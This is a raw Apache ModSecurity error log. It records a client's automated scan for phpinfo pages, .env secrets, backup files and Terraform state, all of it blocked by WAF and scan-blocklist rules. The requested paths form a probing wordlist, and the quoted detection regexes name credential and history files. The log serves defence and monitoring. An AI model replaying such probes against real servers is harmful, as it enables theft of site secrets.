[Tue May 26 13:30:19.282191 2026] [security2:error] [pid 512344:tid 512494] [client 45.148.10.95:19552] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/php_info.php"] [unique_id "ahVTE8bElyei4S77DQcGzAAAABQ"]
[Tue May 26 13:30:19.282827 2026] [security2:error] [pid 512745:tid 512962] [client 45.148.10.95:19486] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/php.php"] [unique_id "ahVTE3KSB_s2CvZg7xNt6gAAAWE"]
[Tue May 26 13:30:19.294115 2026] [security2:error] [pid 512745:tid 512978] [client 45.148.10.95:19362] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/phpinfo.php"] [unique_id "ahVTE3KSB_s2CvZg7xNt6wAAAXE"]
[Tue May 26 13:30:19.300235 2026] [security2:error] [pid 512344:tid 512477] [client 45.148.10.95:19548] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/php-info.php"] [unique_id "ahVTE8bElyei4S77DQcGzQAAAAM"]
[Tue May 26 13:30:19.320127 2026] [security2:error] [pid 512745:tid 512899] [client 45.148.10.95:19468] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/portal/.env"] [unique_id "ahVTE3KSB_s2CvZg7xNt7gAAASI"]
[Tue May 26 13:30:19.348953 2026] [security2:error] [pid 512745:tid 512904] [client 45.148.10.95:19452] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/prod/.env"] [unique_id "ahVTE3KSB_s2CvZg7xNt8AAAASc"]
[Tue May 26 13:30:19.377946 2026] [security2:error] [pid 512344:tid 512576] [client 45.148.10.95:19582] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/product/.env"] [unique_id "ahVTE8bElyei4S77DQcG0wAAAGY"]
[Tue May 26 13:30:19.379455 2026] [security2:error] [pid 512745:tid 512915] [client 45.148.10.95:19522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/production/.env"] [unique_id "ahVTE3KSB_s2CvZg7xNt8gAAATI"]
[Tue May 26 13:30:19.393926 2026] [security2:error] [pid 512344:tid 512572] [client 45.148.10.95:19544] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/project/.env"] [unique_id "ahVTE8bElyei4S77DQcG1QAAAGI"]
[Tue May 26 13:30:19.458713 2026] [security2:error] [pid 512745:tid 512982] [client 45.148.10.95:19516] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/public-api/.env"] [unique_id "ahVTE3KSB_s2CvZg7xNt8wAAAXU"]
[Tue May 26 13:30:19.466844 2026] [security2:error] [pid 512745:tid 512968] [client 45.148.10.95:19468] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/public/phpinfo.php"] [unique_id "ahVTE3KSB_s2CvZg7xNt9QAAAWc"]
[Tue May 26 13:30:19.467366 2026] [security2:error] [pid 512745:tid 513002] [client 45.148.10.95:19504] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/public/.env"] [unique_id "ahVTE3KSB_s2CvZg7xNt9AAAAYk"]
[Tue May 26 13:30:19.494714 2026] [security2:error] [pid 512745:tid 512921] [client 45.148.10.95:19452] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/public_html/.env"] [unique_id "ahVTE3KSB_s2CvZg7xNt9wAAATg"]
[Tue May 26 13:30:19.521054 2026] [security2:error] [pid 512344:tid 512567] [client 45.148.10.95:19394] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/qa/.env"] [unique_id "ahVTE8bElyei4S77DQcG3gAAAF0"]
[Tue May 26 13:30:19.836580 2026] [security2:error] [pid 512344:tid 512530] [client 45.148.10.95:19394] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/s3/.env.bak"] [unique_id "ahVTE8bElyei4S77DQcG9QAAADg"]
[Tue May 26 13:30:19.838418 2026] [security2:error] [pid 512745:tid 512941] [client 46.151.24.148:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVTE3KSB_s2CvZg7xNuCQAAAUw"], referer: https://www.anujtradingco.com/
[Tue May 26 13:30:19.929469 2026] [security2:error] [pid 512745:tid 512983] [client 45.148.10.95:19504] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/server/api/.env"] [unique_id "ahVTE3KSB_s2CvZg7xNuEQAAAXY"]
[Tue May 26 13:30:19.937402 2026] [security2:error] [pid 512745:tid 512901] [client 45.148.10.95:19516] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/server/.env"] [unique_id "ahVTE3KSB_s2CvZg7xNuEgAAASQ"]
[Tue May 26 13:30:19.955934 2026] [security2:error] [pid 512745:tid 512996] [client 45.148.10.95:19546] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/server/backend/.env"] [unique_id "ahVTE3KSB_s2CvZg7xNuEwAAAYM"]
[Tue May 26 13:30:20.074749 2026] [security2:error] [pid 512344:tid 512515] [client 45.148.10.95:5128] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/service/.env"] [unique_id "ahVTFMbElyei4S77DQcHBAAAACk"]
[Tue May 26 13:30:20.080867 2026] [security2:error] [pid 512344:tid 512509] [client 45.148.10.95:19494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/services/.env"] [unique_id "ahVTFMbElyei4S77DQcHBgAAACM"]
[Tue May 26 13:30:20.151209 2026] [security2:error] [pid 512344:tid 512505] [client 45.148.10.95:19394] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/shared/.env"] [unique_id "ahVTFMbElyei4S77DQcHCQAAAB8"]
[Tue May 26 13:30:20.186963 2026] [security2:error] [pid 512745:tid 512905] [client 45.148.10.95:5250] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/shop/.env"] [unique_id "ahVTFHKSB_s2CvZg7xNuIwAAASg"]
[Tue May 26 13:30:20.213360 2026] [security2:error] [pid 512745:tid 512987] [client 45.148.10.95:5132] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/src/.env"] [unique_id "ahVTFHKSB_s2CvZg7xNuJgAAAXo"]
[Tue May 26 13:30:20.352289 2026] [security2:error] [pid 512745:tid 512932] [client 45.148.10.95:19350] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/srv/.env"] [unique_id "ahVTFHKSB_s2CvZg7xNuLAAAAUM"]
[Tue May 26 13:30:20.358987 2026] [security2:error] [pid 512344:tid 512500] [client 45.148.10.95:19538] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/stage/.env"] [unique_id "ahVTFMbElyei4S77DQcHFQAAABo"]
[Tue May 26 13:30:20.366200 2026] [security2:error] [pid 512745:tid 512992] [client 45.148.10.95:5126] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/staging/.env"] [unique_id "ahVTFHKSB_s2CvZg7xNuLgAAAX8"]
[Tue May 26 13:30:20.406907 2026] [security2:error] [pid 512344:tid 512559] [client 45.148.10.95:19494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/stg/.env"] [unique_id "ahVTFMbElyei4S77DQcHGAAAAFU"]
[Tue May 26 13:30:20.509534 2026] [security2:error] [pid 512344:tid 512571] [client 45.148.10.95:19538] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/stripe/.env"] [unique_id "ahVTFMbElyei4S77DQcHHAAAAGE"]
[Tue May 26 13:30:20.560970 2026] [security2:error] [pid 512344:tid 512533] [client 45.148.10.95:19494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/terraform.tfstate.backup"] [unique_id "ahVTFMbElyei4S77DQcHHwAAADs"]
[Tue May 26 13:30:20.599646 2026] [security2:error] [pid 512745:tid 512930] [client 45.148.10.95:19516] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/test.php"] [unique_id "ahVTFHKSB_s2CvZg7xNuQQAAAUE"]
[Tue May 26 13:30:20.614062 2026] [security2:error] [pid 512745:tid 512997] [client 45.148.10.95:19452] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/test/.env"] [unique_id "ahVTFHKSB_s2CvZg7xNuRQAAAYQ"]
[Tue May 26 13:30:20.657394 2026] [security2:error] [pid 512344:tid 512503] [client 45.148.10.95:19538] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/user/.env"] [unique_id "ahVTFMbElyei4S77DQcHKAAAAB0"]
[Tue May 26 13:30:20.674569 2026] [security2:error] [pid 512745:tid 512978] [client 45.148.10.95:19350] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/v1/.env"] [unique_id "ahVTFHKSB_s2CvZg7xNuRwAAAXE"]
[Tue May 26 13:30:20.691291 2026] [security2:error] [pid 512745:tid 513001] [client 45.148.10.95:5132] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/v2/.env"] [unique_id "ahVTFHKSB_s2CvZg7xNuSAAAAYg"]
[Tue May 26 13:30:20.702024 2026] [security2:error] [pid 512745:tid 512902] [client 45.148.10.95:5126] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/v3/.env"] [unique_id "ahVTFHKSB_s2CvZg7xNuSgAAASU"]
[Tue May 26 13:30:20.710580 2026] [security2:error] [pid 512745:tid 512943] [client 46.151.24.148:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVTFHKSB_s2CvZg7xNuRgAAAU4"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1429949&moderation-hash=fcb1dce921150397d62e7b7a24e37920
[Tue May 26 13:30:20.876060 2026] [security2:error] [pid 512344:tid 512599] [client 45.148.10.95:19494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/var/www/.env"] [unique_id "ahVTFMbElyei4S77DQcHMwAAAH0"]
[Tue May 26 13:30:20.876920 2026] [security2:error] [pid 512745:tid 512894] [client 45.148.10.95:19504] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/var/www/html/.env"] [unique_id "ahVTFHKSB_s2CvZg7xNuVgAAAR0"]
[Tue May 26 13:30:20.900519 2026] [security2:error] [pid 512745:tid 512921] [client 45.148.10.95:19546] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/web/.env"] [unique_id "ahVTFHKSB_s2CvZg7xNuVwAAATg"]
[Tue May 26 13:30:21.021308 2026] [security2:error] [pid 512745:tid 512884] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTFHKSB_s2CvZg7xNuPQAAARM"]
